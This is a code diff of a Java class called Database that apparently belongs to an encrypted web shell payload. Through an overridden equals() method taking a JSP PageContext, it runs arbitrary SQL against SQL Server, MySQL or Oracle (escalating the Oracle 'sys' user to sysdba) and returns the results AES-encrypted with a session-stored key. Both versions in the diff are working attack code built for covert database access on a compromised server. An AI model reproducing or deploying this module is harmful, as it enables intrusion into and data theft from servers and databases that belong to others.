@@ -7,133 +7,174 @@ import javax.servlet.ServletResponse;
 import javax.servlet.http.HttpSession;
 import javax.servlet.jsp.PageContext;
 import java.nio.charset.StandardCharsets;
-import java.sql.Connection;
-import java.sql.DriverManager;
-import java.sql.ResultSet;
-import java.sql.ResultSetMetaData;
-import java.util.*;
+import java.sql.*;
+import java.util.ArrayList;
+import java.util.HashMap;
+import java.util.LinkedHashMap;
+import java.util.Map;
 
 public class Database {
-    public static String database;
-    public static String host;
-    public static String pass;
-    public static String port;
-    public static String sql;
     public static String type;
+    public static String host;
+    public static String port;
     public static String user;
+    public static String pass;
+    public static String database;
+    public static String sql;
     private ServletResponse Response;
     private HttpSession Session;
+
+    public Database() {
+    }
 
     public boolean equals(Object obj) {
         PageContext page = (PageContext) obj;
         this.Session = page.getSession();
         this.Response = page.getResponse();
-        Map<String, String> result = new HashMap<>();
+        HashMap result = new HashMap();
+
         try {
-            executeSQL();
-            result.put("msg", executeSQL());
+            this.executeSQL();
+            result.put("msg", this.executeSQL());
             result.put("status", "success");
-        } catch (Exception e) {
-            e.printStackTrace();
+        } catch (Exception var6) {
+            var6.printStackTrace();
             result.put("status", "fail");
-            if (e instanceof ClassNotFoundException) {
+            if (var6 instanceof ClassNotFoundException) {
                 result.put("msg", "NoDriver");
             } else {
-                result.put("msg", e.getMessage());
+                result.put("msg", var6.getMessage());
             }
         }
+
         try {
             ServletOutputStream so = this.Response.getOutputStream();
-            so.write(Encrypt(buildJson(result, true).getBytes(StandardCharsets.UTF_8)));
+            so.write(this.Encrypt(this.buildJson(result, true).getBytes(StandardCharsets.UTF_8)));
             so.flush();
             so.close();
             page.getOut().clear();
-        } catch (Exception e2) {
-            e2.printStackTrace();
+        } catch (Exception var5) {
+            var5.printStackTrace();
         }
+
         return true;
     }
 
     public String executeSQL() throws Exception {
+        String result = "[";
         String driver = null;
         String url = null;
-        if (type.equals("sqlserver")) {
-            driver = "com.microsoft.sqlserver.jdbc.SQLServerDriver";
-            url = "jdbc:sqlserver://%s:%s;DatabaseName=%s";
-        } else if (type.equals("mysql")) {
-            driver = "com.mysql.jdbc.Driver";
-            url = "jdbc:mysql://%s:%s/%s";
-        } else if (type.equals("oracle")) {
-            driver = "oracle.jdbc.driver.OracleDriver";
-            url = "jdbc:oracle:thin:@%s:%s:%s";
-            if (user.equals("sys")) {
-                user += " as sysdba";
-            }
+        switch (type) {
+            case "sqlserver":
+                driver = "com.microsoft.sqlserver.jdbc.SQLServerDriver";
+                url = "jdbc:sqlserver://%s:%s;DatabaseName=%s";
+                break;
+            case "mysql":
+                driver = "com.mysql.jdbc.Driver";
+                url = "jdbc:mysql://%s:%s/%s";
+                break;
+            case "oracle":
+                driver = "oracle.jdbc.driver.OracleDriver";
+                url = "jdbc:oracle:thin:@%s:%s:%s";
+                if (user.equals("sys")) {
+                    user = user + " as sysdba";
+                }
+                break;
         }
-        String url2 = String.format(url, host, port, database);
+
+        url = String.format(url, host, port, database);
         Class.forName(driver);
-        Connection con = DriverManager.getConnection(url2, user, pass);
-        ResultSet rs = con.createStatement().executeQuery(sql);
+        Connection con = DriverManager.getConnection(url, user, pass);
+        Statement statement = con.createStatement();
+        ResultSet rs = statement.executeQuery(sql);
         ResultSetMetaData metaData = rs.getMetaData();
         int count = metaData.getColumnCount();
         String[] colNames = new String[count];
-        for (int i = 0; i < count; i++) {
+
+        for (int i = 0; i < count; ++i) {
             colNames[i] = metaData.getColumnLabel(i + 1);
         }
-        String result = "[" + "[";
-        for (int i2 = 0; i2 < colNames.length; i2++) {
-            result = result + String.format("{\"name\":\"%s\"}", colNames[i2]) + ",";
+
+        result = result + "[";
+        String[] var16 = colNames;
+        int var11 = colNames.length;
+
+        for (int var12 = 0; var12 < var11; ++var12) {
+            String col = var16[var12];
+            String colRecord = String.format("{\"name\":\"%s\"}", col);
+            result = result + colRecord + ",";
         }
-        String result2 = result.substring(0, result.length() - 1) + "],";
-        Map<String, Object> linkedHashMap = new LinkedHashMap<>();
-        List<Map<String, Object>> recordList = new ArrayList<>();
-        while (rs.next()) {
-            String result3 = result2 + "[";
-            for (String col : colNames) {
-                linkedHashMap.put(col, rs.getObject(col));
-                result3 = result3 + "\"" + rs.getObject(col) + "\",";
+
+        result = result.substring(0, result.length() - 1);
+        result = result + "],";
+        Map record = new LinkedHashMap();
+
+        for (ArrayList recordList = new ArrayList(); rs.next(); result = result + "],") {
+            result = result + "[";
+            String[] var19 = colNames;
+            int var20 = colNames.length;
+
+            for (int var21 = 0; var21 < var20; ++var21) {
+                String col = var19[var21];
+                record.put(col, rs.getObject(col));
+                result = result + "\"" + rs.getObject(col) + "\",";
             }
-            recordList.add(linkedHashMap);
-            result2 = result3.substring(0, result3.length() - 1) + "],";
+
+            recordList.add(record);
+            result = result.substring(0, result.length() - 1);
         }
-        String result4 = result2.substring(0, result2.length() - 1) + "]";
+
+        result = result.substring(0, result.length() - 1);
+        result = result + "]";
         rs.close();
         con.close();
-        return result4;
+        return result;
     }
 
     private byte[] Encrypt(byte[] bs) throws Exception {
-        SecretKeySpec skeySpec = new SecretKeySpec(this.Session.getAttribute("u").toString().getBytes(StandardCharsets.UTF_8), "AES");
+        String key = this.Session.getAttribute("u").toString();
+        byte[] raw = key.getBytes(StandardCharsets.UTF_8);
+        SecretKeySpec skeySpec = new SecretKeySpec(raw, "AES");
         Cipher cipher = Cipher.getInstance("AES/ECB/PKCS5Padding");
         cipher.init(1, skeySpec);
-        return cipher.doFinal(bs);
+        byte[] encrypted = cipher.doFinal(bs);
+        return encrypted;
     }
 
-    private String buildJson(Map<String, String> entity, boolean encode) throws Exception {
+    private String buildJson(Map entity, boolean encode) throws Exception {
         StringBuilder sb = new StringBuilder();
         String version = System.getProperty("java.version");
         sb.append("{");
-        for (String key : entity.keySet()) {
+
+        for (Object o : entity.keySet()) {
+            String key = (String) o;
             sb.append("\"" + key + "\":\"");
-            String value = entity.get(key);
+            String value = ((String) entity.get(key));
             if (encode) {
+                Class Base64;
+                Object Encoder;
                 if (version.compareTo("1.9") >= 0) {
-                    getClass();
-                    Class Base64 = Class.forName("java.util.Base64");
-                    Object Encoder = Base64.getMethod("getEncoder", null).invoke(Base64, null);
+                    this.getClass();
+                    Base64 = Class.forName("java.util.Base64");
+                    Encoder = Base64.getMethod("getEncoder", (Class[]) null).invoke(Base64, (Object[]) null);
                     value = (String) Encoder.getClass().getMethod("encodeToString", byte[].class).invoke(Encoder, value.getBytes(StandardCharsets.UTF_8));
                 } else {
-                    getClass();
-                    Object Encoder2 = Class.forName("sun.misc.BASE64Encoder").newInstance();
-                    value = ((String) Encoder2.getClass().getMethod("encode", byte[].class).invoke(Encoder2, value.getBytes(StandardCharsets.UTF_8))).replace("\n", "").replace("\r", "");
+                    this.getClass();
+                    Base64 = Class.forName("sun.misc.BASE64Encoder");
+                    Encoder = Base64.newInstance();
+                    value = (String) Encoder.getClass().getMethod("encode", byte[].class).invoke(Encoder, value.getBytes(StandardCharsets.UTF_8));
+                    value = value.replace("\n", "").replace("\r", "");
                 }
             }
+
             sb.append(value);
             sb.append("\",");
         }
+
         if (sb.toString().endsWith(",")) {
             sb.setLength(sb.length() - 1);
         }
+
         sb.append("}");
         return sb.toString();
     }
